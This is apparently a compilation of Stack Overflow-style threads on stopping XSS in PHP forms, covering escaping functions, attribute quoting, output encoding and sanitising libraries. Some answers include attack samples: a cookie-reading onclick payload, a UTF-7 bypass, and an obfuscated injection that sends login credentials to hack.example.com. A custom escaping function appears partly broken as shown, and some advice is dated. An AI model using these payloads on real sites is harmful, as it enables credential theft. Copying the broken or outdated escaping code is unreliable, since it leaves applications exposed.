I have an input which allows users to enter text, which is then sent using PHP to another page, where it is stored in a database. I have done some simple validation ( checking if the input wasn't empty), and that works pretty well. However, I found out that I can type in HTML tags, such as
<p>
and it bypasses that validation and also messes up the input.
How can I check if the input contained HTML tags, and if so, return an error?
You can simply use htmlspecialchars, or strip_tags before inserting into database.
You can also use mysqli_real_escape_string or PDO::quote to secure strings
To check try this:
if( preg_match('#^<.>.+</.>$#', $your_value) ){
echo "NOT GOOD"; // and some error too
}
You could do this:
<input type='text' pattern='[a-zA-Z0-9]+'>
That ensures only letters and numbers can go in and wont submit if anything else is inside the input.
However, this is only good client side and will only work for IE9+
This is also not the best method for validation if someone knows what they're doing. All they have to do is go into the source code to take out the pattern attribute, but for those who don't know, it will be fine.
For the PHP, you can use strip_tags(). Found here
I have php code like this
<?php
$input_from_user = "w' onclick = 'alert(document.cookie);'";
$i_am_barcelona_fan = htmlentities($input_from_user);
?>
<input type = 'text' name = 'messi_fan' value ='<?php echo $i_am_barcelona_fan;?>' />
I am using htmlentities to protect from XSS attack, but still I am vulnerable to the above string.
Why is my code vulnerable to XSS attack? How can I protect from my code from it?
You're not telling PHP to escape quotes as well, and you should use htmlspecialchars() instead:
<input type = 'text' name = 'messi_fan' value ='<?php echo htmlspecialchars($input_from_user, ENT_QUOTES, 'UTF-8'); ?>' />
Demo
Never ever (ever) trust foreign input introduced to your PHP code. Always sanitize and validate foreign input before using it in code. The filter_var and filter_input functions can sanitize text and validate text formats (e.g. email addresses).
Foreign input can be anything: $_GET and $_POST form input data, some values in the $_SERVER superglobal, and the HTTP request body via fopen('php://input', 'r'). Remember, foreign input is not limited to form data submitted by the user. Uploaded and downloaded files, session values, cookie data, and data from third-party web services are foreign input, too.
While foreign data can be stored, combined, and accessed later, it is still foreign input. Every time you process, output, concatenate, or include data in your code, ask yourself if the data is filtered properly and can it be trusted.
Data may be filtered differently based on its purpose. For example, when unfiltered foreign input is passed into HTML page output, it can execute HTML and JavaScript on your site! This is known as Cross-Site Scripting (XSS) and can be a very dangerous attack. One way to avoid XSS is to sanitize all user-generated data before outputting it to your page by removing HTML tags with the strip_tags function or escaping characters with special meaning into their respective HTML entities with the htmlentities or htmlspecialchars functions.
Another example is passing options to be executed on the command line. This can be extremely dangerous (and is usually a bad idea), but you can use the built-in escapeshellarg function to sanitize the executed command’s arguments.
One last example is accepting foreign input to determine a file to load from the filesystem. This can be exploited by changing the filename to a file path. You need to remove ”/”, “../”, null bytes, or other characters from the file path so it can’t load hidden, non-public, or sensitive files.
Learn about data filtering (http://www.php.net/manual/en/book.filter.php)
Learn about filter_var (http://php.net/manual/en/function.filter-var.php)
I'm building a PHP intranet for my boss. A simple customer, order, quote system. It will be denied access from the Internet and only used by 3 people. I'm not so concerned with security as I am with validation. Javascript is disables on all machines.
The problem I have is this:
Employee enters valid data into a form containing any of the following :;[]"' etc.
Form $_POSTS this data to a validationAndProcessing.php page, and determines whether the employee entered data or not in to the fields. If they didn't they are redirected back to the data input page and the field they missed out is highlighted in red.
htmlspecialchars() is applied to all data being re-populated to the form from what they entered earlier.
Form is then resubmitted to validationAndProcessing.php page, if successful data is entered into the database and employee is taken to display data page.
My question is this:
If an employee repeatedly enters no data in step 1, they will keep moving between step 1 and 4 each time having htmlspecialchars() applied to the data.
So that:- &
becomes:- &
becomes:- &
becomes:- &amp;
etc..
How can I stop htmlspecialchars() being applied multiple times to data that is already cleaned?
Thanks,
Adam
Check the manual page on htmlspecialchars:
string htmlspecialchars ( string $string [, int $quote_style = ENT_COMPAT [, string $charset [, bool $double_encode = true ]]] )
the $double_encode option should be what you are looking for.
In a properly set up data flow, though, this shouldn't be a possibility at all, except if there is data incoming from the user or a 3rd party service that could or could not already contain HTML encoded characters. (Not that I haven't built a few improperly set up data flows in my career. But that's why I know why it's so important they're clean and well defined. :-)
You should only be using htmlspecialchars in the HTML output, never anywhere else.
<input name="var" value="<?php echo htmlspecialchars($var)?>">
If $var contained an ampersand, say, then in the HTML it would output the encoded value:
<input name="var" value="this&that">
However, the user would only see this&that in their input field, and upon submission, $_GET['var'] will be this&that, not the encoded version.
On the PHP side of things the only thing you may want to do is remove slashes if magic quotes are on:
if (get_magic_quotes_gpc())
$var = stripslashes($_POST['var']);
else
$var = $_POST['var'];
From there you should store the raw data in the database, not HTML-encoded versions. To avoid SQL injection, use mysql_real_escape_string if you're using normal mysql functions, or use PDO instead.
So that:- &
becomes:- &
becomes:- &
becomes:- &amp;
You are simply wrong.
Just try it and see
<form>
<input name="a" value="<?=htmlspecialchars($_GET["a"])?>">
<input type=submit>
</form>
Let's say we have this form, and the possible part for a user to inject malicious code is this below
...
<input type=text name=username value=
<?php echo htmlspecialchars($_POST['username']); ?>>
...
We can't simply put a tag, or a javascript:alert(); call, because value will be interpreted as a string, and htmlspecialchars filters out the <,>,',", so We can't close off the value with quotations.
We can use String.fromCode(.....) to get around the quotes, but I still unable to get a simple alert box to pop up.
Any ideas?
Also, it's important to mention that allowing people to inject HTML or JavaScript into your page (and not your datasource) carries no inherent security risk itself. There already exist browser extensions that allow you to modify the DOM and scripts on web pages, but since it's only client-side, they're the only ones that will know.
Where XSS becomes a problem is when people a) use it to bypass client-side validation or input filtering or b) when people use it to manipulate input fields (for example, changing the values of OPTION tags in an ACL to grant them permissions they shouldn't have). The ONLY way to prevent against these attacks is to sanitize and validate input on the server-side instead of, or in addition to, client-side validation.
For sanitizing HTML out of input, htmlspecialchars is perfectly adequate unless you WANT to allow certain tags, in which case you can use a library like HTMLPurifier. If you're placing user input in HREF, ONCLICK, or any attribute that allows scripting, you're just asking for trouble.
EDIT: Looking at your code, it looks like you aren't quoting your attributes! That's pretty silly. If someone put their username as:
john onclick="alert('hacking your megabits!1')"
Then your script would parse as:
<input type=text name=username value=john onclick="alert('hacking your megabits!1')">
ALWAYS use quotes around attributes. Even if they aren't user-inputted, it's a good habit to get into.
<input type="text" name="username" value="<?php echo htmlspecialchars($_POST['username']); ?>">
There's one way. You aren't passing htmlspecialchars() the third encoding parameter or checking encoding correctly, so:
$source = '<script>alert("xss")</script>';
$source = mb_convert_encoding($source, 'UTF-7');
$source = htmlspecialchars($source); //defaults to ISO-8859-1
header('Content-Type: text/html;charset=UTF-7');
echo '<html><head>' . $source . '</head></html>';
Only works if you can a) set the page to output UTF-7 or b) trick the page into doing so (e.g. iframe on a page without a clear charset set). The solution is to ensure all input is of the correct encoding, and that the expected encoding is correctly set on htmlspecialchars().
How it works? In UTF-7, <>" chars have different code points than UTF-8/ISO/ASCII so they are not escaped unless convert the output to UTF-8 for assurance (see iconv extension).
value is a normal HTML attribute, and has nothing to do with Javascript.
Therefore, String.fromCharCode is interpreted as a literal value, and is not executed.
In order to inject script, you first need to force the parser to close the attribute, which will be difficult to do without >'".
You forgot to put quotes around the attribute value, so all you need is a space.
Even if you do quote the value, it may still be vulnerable; see this page.
Somewhat similar to Daniel's answer, but breaking out of the value= by first setting a dummy value, then adding whitespace to put in the script which runs directly by a trick with autofocus, setting the input field blank and then adds a submit function which runs when the form is submitted, leaking the username and password to an url of my choice, creating strings from the string prototype without quotation (because quotations would be sanitized):
<body>
<script type="text/javascript">
function redirectPost(url, data) {
var form = document.createElement('form');
document.body.appendChild(form);
form.method = 'post';
form.action = url;
for (var name in data) {
var input = document.createElement('input');
input.type = 'hidden';
input.name = name;
input.value = data[name];
form.appendChild(input);
}
form.submit();
}
redirectPost('http://f00b4r/b4z/', { login_username: 'a onfocus=document.loginform.login_username.value=null;document.forms[0].onsubmit=function(){fetch(String(/http:/).substring(1).slice(0,-1)+String.fromCharCode(47)+String.fromCharCode(47)+String(/hack.example.com/).substring(1).slice(0,-1)+String.fromCharCode(47)+String(/logger/).substring(1).slice(0,-1)+String.fromCharCode(47)+String(/log.php?to=haxxx%40example.com%26payload=/).substring(1).slice(0,-1)+document.loginform.login_username.value+String.fromCharCode(44)+document.loginform.login_password.value+String(/%26send_submit=Send+Email/).substring(1).slice(0,-1)).then(null).then(null)}; autofocus= '});
</script>
You cannt exploit that input field which contain that func but you can exploit any btn or paragraph or heading or text near it by:
like you can add this on btn -> onclick=alert('Hello')
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 1 year ago.
Improve this question
I have PHP configured so that magic quotes are on and register globals are off.
I do my best to always call htmlentities() for anything I am outputing that is derived from user input.
I also occasionally seach my database for common things used in xss attached such as...
<script
What else should I be doing and how can I make sure that the things I am trying to do are always done.
Escaping input is not the best you can do for successful XSS prevention. Also output must be escaped. If you use Smarty template engine, you may use |escape:'htmlall' modifier to convert all sensitive characters to HTML entities (I use own |e modifier which is alias to the above).
My approach to input/output security is:
store user input not modified (no HTML escaping on input, only DB-aware escaping done via PDO prepared statements)
escape on output, depending on what output format you use (e.g. HTML and JSON need different escaping rules)
I'm of the opinion that one shouldn't escape anything during input, only on output. Since (most of the time) you can not assume that you know where that data is going. Example, if you have form that takes data that later on appears in an email that you send out, you need different escaping (otherwise a malicious user could rewrite your email-headers).
In other words, you can only escape at the very last moment the data is "leaving" your application:
List item
Write to XML file, escape for XML
Write to DB, escape (for that particular DBMS)
Write email, escape for emails
etc
To go short:
You don't know where your data is going
Data might actually end up in more than one place, needing different escaping mechanism's BUT NOT BOTH
Data escaped for the wrong target is really not nice. (E.g. get an email with the subject "Go to Tommy\'s bar".)
Esp #3 will occur if you escape data at the input layer (or you need to de-escape it again, etc).
PS: I'll second the advice for not using magic_quotes, those are pure evil!
There are a lot of ways to do XSS (See http://ha.ckers.org/xss.html) and it's very hard to catch.
I personally delegate this to the current framework I'm using (Code Igniter for example). While not perfect, it might catch more than my hand made routines ever do.
This is a great question.
First, don't escape text on input except to make it safe for storage (such as being put into a database). The reason for this is you want to keep what was input so you can contextually present it in different ways and places. Making changes here can compromise your later presentation.
When you go to present your data filter out what shouldn't be there. For example, if there isn't a reason for javascript to be there search for it and remove it. An easy way to do that is to use the strip_tags function and only present the html tags you are allowing.
Next, take what you have and pass it thought htmlentities or htmlspecialchars to change what's there to ascii characters. Do this based on context and what you want to get out.
I'd, also, suggest turning off Magic Quotes. It is has been removed from PHP 6 and is considered bad practice to use it. Details at http://us3.php.net/magic_quotes
For more details check out http://ha.ckers.org/xss.html
This isn't a complete answer but, hopefully enough to help you get started.
rikh Writes:
I do my best to always call htmlentities() for anything I am outputing that is derived from user input.
See Joel's essay on Making Code Look Wrong for help with this
Template library. Or at least, that is what template libraries should do.
To prevent XSS all output should be encoded. This is not the task of the main application / control logic, it should solely be handled by the output methods.
If you sprinkle htmlentities() thorughout your code, the overall design is wrong. And as you suggest, you might miss one or two spots.
That's why the only solution is rigorous html encoding -> when output vars get written into a html/xml stream.
Unfortunately, most php template libraries only add their own template syntax, but don't concern themselves with output encoding, or localization, or html validation, or anything important. Maybe someone else knows a proper template library for php?
I rely on PHPTAL for that.
Unlike Smarty and plain PHP, it escapes all output by default. This is a big win for security, because your site won't become vurnelable if you forget htmlspecialchars() or |escape somewhere.
XSS is HTML-specific attack, so HTML output is the right place to prevent it. You should not try pre-filtering data in the database, because you could need to output data to another medium which doesn't accept HTML, but has its own risks.
Escaping all user input is enough for most sites. Also make sure that session IDs don't end up in the URL so they can't be stolen from the Referer link to another site. Additionally, if you allow your users to submit links, make sure no javascript: protocol links are allowed; these would execute a script as soon as the user clicks on the link.
If you are concerned about XSS attacks, encoding your output strings to HTML is the solution. If you remember to encode every single output character to HTML format, there is no way to execute a successful XSS attack.
Read more:
Sanitizing user data: How and where to do it
Personally, I would disable magic_quotes. In PHP5+ it is disabled by default and it is better to code as if it is not there at all as it does not escape everything and it will be removed from PHP6.
Next, depending on what type of user data you are filtering will dictate what to do next e.g. if it is just text e.g. a name, then strip_tags(trim(stripslashes())); it or to check for ranges use regular expressions.
If you expect a certain range of values, create an array of the valid values and only allow those values through (in_array($userData, array(...))).
If you are checking numbers use is_numeric to enforce whole numbers or cast to a specific type, that should prevent people trying to send strings in stead.
If you have PHP5.2+ then consider looking at filter() and making use of that extension which can filter various data types including email addresses. Documentation is not particularly good, but is improving.
If you have to handle HTML then you should consider something like PHP Input Filter or HTML Purifier. HTML Purifier will also validate HTML for conformance. I am not sure if Input Filter is still being developed. Both will allow you to define a set of tags that can be used and what attributes are allowed.
Whatever you decide upon, always remember, never ever trust anything coming into your PHP script from a user (including yourself!).
All of these answers are great, but fundamentally, the solution to XSS will be to stop generating HTML documents by string manipulation.
Filtering input is always a good idea for any application.
Escaping your output using htmlentities() and friends should work as long as it's used properly, but this is the HTML equivalent of creating a SQL query by concatenating strings with mysql_real_escape_string($var) - it should work, but fewer things can validate your work, so to speak, compared to an approach like using parameterized queries.
The long-term solution should be for applications to construct the page internally, perhaps using a standard interface like the DOM, and then to use a library (like libxml) to handle the serialization to XHTML/HTML/etc. Of course, we're a long ways away from that being popular and fast enough, but in the meantime we have to build our HTML documents via string operations, and that's inherently more risky.
“Magic quotes” is a palliative remedy for some of the worst XSS flaws which works by escaping everything on input, something that's wrong by design. The only case where one would want to use it is when you absolutely must use an existing PHP application known to be written carelessly with regard to XSS. (In this case you're in a serious trouble even with “magic quotes”.) When developing your own application, you should disable “magic quotes” and follow XSS-safe practices instead.
XSS, a cross-site scripting vulnerability, occurs when an application includes strings from external sources (user input, fetched from other websites, etc) in its [X]HTML, CSS, ECMAscript or other browser-parsed output without proper escaping, hoping that special characters like less-than (in [X]HTML), single or double quotes (ECMAscript) will never appear. The proper solution to it is to always escape strings according to the rules of the output language: using entities in [X]HTML, backslashes in ECMAscript etc.
Because it can be hard to keep track of what is untrusted and has to be escaped, it's a good idea to always escape everything that is a “text string” as opposed to “text with markup” in a language like HTML. Some programming environments make it easier by introducing several incompatible string types: “string” (normal text), “HTML string” (HTML markup) and so on. That way, a direct implicit conversion from “string” to “HTML string” would be impossible, and the only way a string could become HTML markup is by passing it through an escaping function.
“Register globals”, though disabling it is definitely a good idea, deals with a problem entirely different from XSS.
I find that using this function helps to strip out a lot of possible xss attacks:
<?php
function h($string, $esc_type = 'htmlall')
{
switch ($esc_type) {
case 'css':
$string = str_replace(array('<', '>', '\\'), array('<', '>', '/'), $string);
// get rid of various versions of javascript
$string = preg_replace(
'/j\s*[\\\]*\s*a\s*[\\\]*\s*v\s*[\\\]*\s*a\s*[\\\]*\s*s\s*[\\\]*\s*c\s*[\\\]*\s*r\s*[\\\]*\s*i\s*[\\\]*\s*p\s*[\\\]*\s*t\s*[\\\]*\s*:/i',
'blocked', $string);
$string = preg_replace(
'/#\s*[\\\]*\s*i\s*[\\\]*\s*m\s*[\\\]*\s*p\s*[\\\]*\s*o\s*[\\\]*\s*r\s*[\\\]*\s*t/i',
'blocked', $string);
$string = preg_replace(
'/e\s*[\\\]*\s*x\s*[\\\]*\s*p\s*[\\\]*\s*r\s*[\\\]*\s*e\s*[\\\]*\s*s\s*[\\\]*\s*s\s*[\\\]*\s*i\s*[\\\]*\s*o\s*[\\\]*\s*n\s*[\\\]*\s*/i',
'blocked', $string);
$string = preg_replace('/b\s*[\\\]*\s*i\s*[\\\]*\s*n\s*[\\\]*\s*d\s*[\\\]*\s*i\s*[\\\]*\s*n\s*[\\\]*\s*g:/i', 'blocked', $string);
return $string;
case 'html':
//return htmlspecialchars($string, ENT_NOQUOTES);
return str_replace(array('<', '>'), array('<' , '>'), $string);
case 'htmlall':
return htmlentities($string, ENT_QUOTES);
case 'url':
return rawurlencode($string);
case 'query':
return urlencode($string);
case 'quotes':
// escape unescaped single quotes
return preg_replace("%(?<!\\\\)'%", "\\'", $string);
case 'hex':
// escape every character into hex
$s_return = '';
for ($x=0; $x < strlen($string); $x++) {
$s_return .= '%' . bin2hex($string[$x]);
}
return $s_return;
case 'hexentity':
$s_return = '';
for ($x=0; $x < strlen($string); $x++) {
$s_return .= '&#x' . bin2hex($string[$x]) . ';';
}
return $s_return;
case 'decentity':
$s_return = '';
for ($x=0; $x < strlen($string); $x++) {
$s_return .= '&#' . ord($string[$x]) . ';';
}
return $s_return;
case 'javascript':
// escape quotes and backslashes, newlines, etc.
return strtr($string, array('\\'=>'\\\\',"'"=>"\\'",'"'=>'\\"',"\r"=>'\\r',"\n"=>'\\n','</'=>'<\/'));
case 'mail':
// safe way to display e-mail address on a web page
return str_replace(array('#', '.'),array(' [AT] ', ' [DOT] '), $string);
case 'nonstd':
// escape non-standard chars, such as ms document quotes
$_res = '';
for($_i = 0, $_len = strlen($string); $_i < $_len; $_i++) {
$_ord = ord($string{$_i});
// non-standard char, escape it
if($_ord >= 126){
$_res .= '&#' . $_ord . ';';
} else {
$_res .= $string{$_i};
}
}
return $_res;
default:
return $string;
}
}
?>
Source
Make you any session cookies (or all cookies) you use HttpOnly. Most browsers will hide the cookie value from JavaScript in that case. User could still manually copy cookies, but this helps prevent direct script access. StackOverflow had this problem durning beta.
This isn't a solution, just another brick in the wall
Don't trust user input
Escape all free-text output
Don't use magic_quotes; see if there's a DBMS-specfic variant, or use PDO
Consider using HTTP-only cookies where possible to avoid any malicious script being able to hijack a session
You should at least validate all data going into the database. And try to validate all data leaving the database too.
mysql_real_escape_string is good to prevent SQL injection, but XSS is trickier.
You should preg_match, stip_tags, or htmlentities where possible!
The best current method for preventing XSS in a PHP application is HTML Purifier (http://htmlpurifier.org/). One minor drawback to it is that it's a rather large library and is best used with an op code cache like APC. You would use this in any place where untrusted content is being outputted to the screen. It is much more thorough that htmlentities, htmlspecialchars, filter_input, filter_var, strip_tags, etc.
Use an existing user-input sanitization library to clean all user-input. Unless you put a lot of effort into it, implementing it yourself will never work as well.
I find the best way is using a class that allows you to bind your code so you never have to worry about manually escaping your data.
It is difficult to implement a thorough sql injection/xss injection prevention on a site that doesn't cause false alarms. In a CMS the end user might want to use <script> or <object> that links to items from another site.
I recommend having all users install FireFox with NoScript ;-)